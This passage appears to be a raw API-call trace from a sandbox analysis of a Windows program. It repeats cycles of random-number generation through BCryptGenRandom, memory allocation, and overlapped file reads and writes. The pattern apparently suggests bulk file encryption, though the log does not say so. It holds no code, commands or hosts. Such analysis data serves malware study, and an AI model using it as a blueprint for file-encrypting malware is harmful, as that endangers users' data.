lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0155.408] CloseHandle (hObject=0x308) returned 1 [0155.408] free (_Block=0x3d70450) [0155.408] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0155.798] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.798] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0155.798] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.799] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.799] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0155.799] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0155.799] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0155.799] free (_Block=0x3e305b8) [0155.799] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0155.799] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0155.800] free (_Block=0x1fa91d0) [0155.800] free (_Block=0x1fa2ed8) [0155.800] free (_Block=0x1fa90b8) [0155.800] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0155.800] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0155.855] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x17c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0155.855] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0155.855] CloseHandle (hObject=0x308) returned 1 [0155.856] free (_Block=0x3df0008) [0155.856] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0156.166] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x4b60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0156.168] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0156.292] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x37de, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0156.377] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0156.908] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x6180, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0156.910] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0156.922] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x21b2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0156.922] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0156.923] CloseHandle (hObject=0x308) returned 1 [0156.923] free (_Block=0x3df0008) [0156.923] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0156.930] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.931] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0156.931] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.931] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0156.931] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0156.932] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0156.932] free (_Block=0x3e305b8) [0156.932] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0156.932] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0156.932] free (_Block=0x1fa91d0) [0156.932] free (_Block=0x1fa2ed8) [0156.932] free (_Block=0x1fa90b8) [0156.932] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0156.932] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0156.934] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe430, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0156.934] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0156.935] CloseHandle (hObject=0x308) returned 1 [0156.935] free (_Block=0x3df0008) [0156.935] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0156.945] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.946] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0156.946] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.946] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0156.947] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0156.947] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0156.947] free (_Block=0x3e305b8) [0156.947] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0156.947] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0156.947] free (_Block=0x1fa91d0) [0156.947] free (_Block=0x1fa2ed8) [0156.947] free (_Block=0x1fa90b8) [0156.947] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0156.947] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0156.949] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x10890, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0156.949] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0156.950] CloseHandle (hObject=0x308) returned 1 [0156.951] free (_Block=0x3df0008) [0156.951] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0156.959] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.960] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0156.960] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.960] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0156.961] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0156.961] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0156.961] free (_Block=0x3e305b8) [0156.961] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0156.961] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0156.961] free (_Block=0x1fa91d0) [0156.961] free (_Block=0x1fa2ed8) [0156.961] free (_Block=0x1fa90b8) [0156.961] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0156.961] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0156.963] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x107f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0156.964] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0156.965] CloseHandle (hObject=0x308) returned 1 [0156.965] free (_Block=0x3df0008) [0156.965] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0156.973] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.973] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0156.973] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.974] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0156.974] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0156.974] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0156.974] free (_Block=0x3e305b8) [0156.974] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0156.974] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0156.975] free (_Block=0x1fa91d0) [0156.975] free (_Block=0x1fa2ed8) [0156.975] free (_Block=0x1fa90b8) [0156.975] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0156.975] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0156.976] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x59d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0156.976] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0156.988] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3d24, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0156.989] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0156.989] CloseHandle (hObject=0x308) returned 1 [0156.989] free (_Block=0x3df0008) [0156.990] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0156.999] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.999] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0157.000] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.000] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0157.000] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0157.000] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0157.000] free (_Block=0x3e305b8) [0157.000] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0157.001] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0157.001] free (_Block=0x1fa91d0) [0157.001] free (_Block=0x1fa2ed8) [0157.001] free (_Block=0x1fa90b8) [0157.001] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0157.001] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.002] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4240, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0157.003] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.015] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3c9c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0157.015] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.016] CloseHandle (hObject=0x308) returned 1 [0157.016] free (_Block=0x3df0008) [0157.016] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.228] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.228] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0157.228] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.229] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0157.229] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0157.229] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0157.229] free (_Block=0x3e305b8) [0157.229] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0157.229] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0157.230] free (_Block=0x1fa91d0) [0157.230] free (_Block=0x1fa2ed8) [0157.230] free (_Block=0x1fa90b8) [0157.230] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0157.230] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.233] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4940, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0157.233] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.246] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4960, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0157.260] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.277] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4584, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0157.278] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.278] CloseHandle (hObject=0x308) returned 1 [0157.278] free (_Block=0x3df0008) [0157.278] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.289] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.289] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0157.289] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.290] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.290] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0157.290] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0157.290] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0157.290] free (_Block=0x3e305b8) [0157.290] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0157.290] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0157.291] free (_Block=0x1fa91d0) [0157.291] free (_Block=0x1fa2ed8) [0157.291] free (_Block=0x1fa90b8) [0157.291] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0157.291] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.292] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2b10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0157.293] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.305] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2ae8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0157.307] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.321] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4a5a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0157.323] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0157.323] CloseHandle (hObject=0x308) returned 1 [0157.323] free (_Block=0x3df0008) 